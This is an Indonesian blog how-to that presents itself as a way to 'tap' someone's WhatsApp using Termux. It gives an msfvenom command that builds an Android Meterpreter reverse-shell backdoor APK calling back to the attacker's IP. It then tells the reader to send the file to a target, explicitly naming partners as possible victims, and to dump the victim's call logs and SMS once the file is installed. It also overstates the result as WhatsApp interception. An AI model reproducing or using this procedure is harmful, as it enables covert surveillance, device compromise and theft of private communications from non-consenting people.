Cara Sadap WA Lewat Termux 2022

Cara Sadap WA Lewat Termux
Cara Sadap WA Lewat Termux - Pastinya anda sudah tidak asing lagi dengan aplikasi yang satu ini, yaitu aplikasi WhatsApp.

Dimana aplikasi WhatsApp ini sudah banyak yang menggunakannya, mulai dari kalangan anak-anak sampai dengan kalangan orang tua.

Dan kini cara menyadap WhatsApp merupakan sebuah langkah-langkah untuk mematai aktivitas apa saja yang dilakukan oleh pengguna akun WhatsApp yang menjadi korban.

Yang mana kegiatan menyadap akun WhatsApp ini dapat dilakukan oleh orang tua untuk mengawasi anak mereka dan tujuan positif lainnya. Namun ada juga yang untuk mematai pasangannya.

Nah kali ini kami akan membagikan tips tentang bagaimana cara untuk menyadap WhatsApp dengan aplikasi Termux.

Perlu diketahui bersama, bahwa aplikasi Termux adalah terminal emulator dan environment Linux berbasis Linux Debian.


Dimana ini juga salah satu aplikasi yang didesain untuk sistem operasi Android. Aplikasi ini dapat digunakan untuk Smartphone yang telah dibekali OS Android mulai dari 5.0 atau Lolipop.

Terdapat ada beberapa trik untuk cara sadap WA lewat Termux orang lain, salah satunya dengan menggunakan aplikasi Termux ini.

Jika anda penasaran bagaimana caranya, maka anda dapat menyimak langsung artikel ini sampai selesai agar anda mengetahui caranya.


Cara Sadap WA Lewat Termux


Cara Sadap WA Lewat Termux Terbaru

Cara Sadap WA Lewat Termux
Cara Sadap WA Lewat Termux Terbaru
Adapun dibawah ini adalah langkah-langkah untuk melakukan cara sadap WA lewat Termux yang dapat dilakukan dengan cukup mudah:

  • Langkah pertama, silahkan pastikan Smartphone atau perangkat anda minimal memiliki Operasi Sistem (OS) Lolipop 5.0 keatas, 32 ataupun 64 bit katas.
  • Kemudian silahkan download aplikasi Termux di Google Play Store atau lebih cepatnya anda bisa klik link berikut ini (https://m.apkpure.com/id/termux/com.termux)
  • Selanjutnya lihatlah alamat IP anda sendiri dengan mengetik ifconfig pada aplikasi Termux.
  • Langkah berikutnya silahkan anda ketik script Termuz sadap WA 2022 berikut ini:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.166 LPORT=4444 R >hack.apk
  • Nah LHOST pada kalimat tadi diganti dengan alamat IP anda sendiri yang sudah dilihat pada langkah awal.
  • Lalu buka menu File File > Home > hack.apk untuk melihat file backdoor yang sudah jadi.
  • Setelah itu, silahkan anda kirim file backdoor tersebut ke target baik itu melalui Mesengger, WhatsApp atau yang lainnya.
  • Pada saat target berhasil menginstall file APK yang anda kirimkan tadi, maka tandanya anda sudah dapat melihat atau menyadap akun WhatsApp si target.
  • Jika anda ingin melihat history panggilan si target maka anda ketik saja dump_callog. Sedangkan untuk melihat riwayat pesan akun WhatsApp si target maka ketik saja dump-sms.


Akhir Kata

Nah demikianlah itu dia langkah-langkah yang sudah kami bagikan diatas untuk melakukan penyadapan WhatsApp, maka dari itu anda tidak akan kebingungan lagi untuk mencari caranya.

Bagaimana cukup mudah bukan untuk dilakukan? dan yang pastinya tidak akan menghabiskan banyaknya waktu anda.

Silahkan anda ikuti langkah-langkah diatas jika ingin mencobanya, namun perlu diingat bahwa anda harus melakukan tahapan dengan benar agar prosesnya berhasil.

Dimana cara menyadap WhatsApp dengan script Termux yang kami bagikan tanpa meminjam Smartphone si target, dapat anda lakukan dengan cukup mudah.

Jika menurut anda informasi ini penting, maka anda bisa langsung membagikannya ke teman-teman atau ke akun media sosial yang anda punya.

Itulah seluruh isi bahasan kami pada artikel kali ini tentang cara sadap WA lewat Termux. Sekian dan semoga bermanfaat ya guyss.
Dody S. Praktisi teknologi, editor dan jurnalis di 1001Media.

Tidak ada komentar:

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel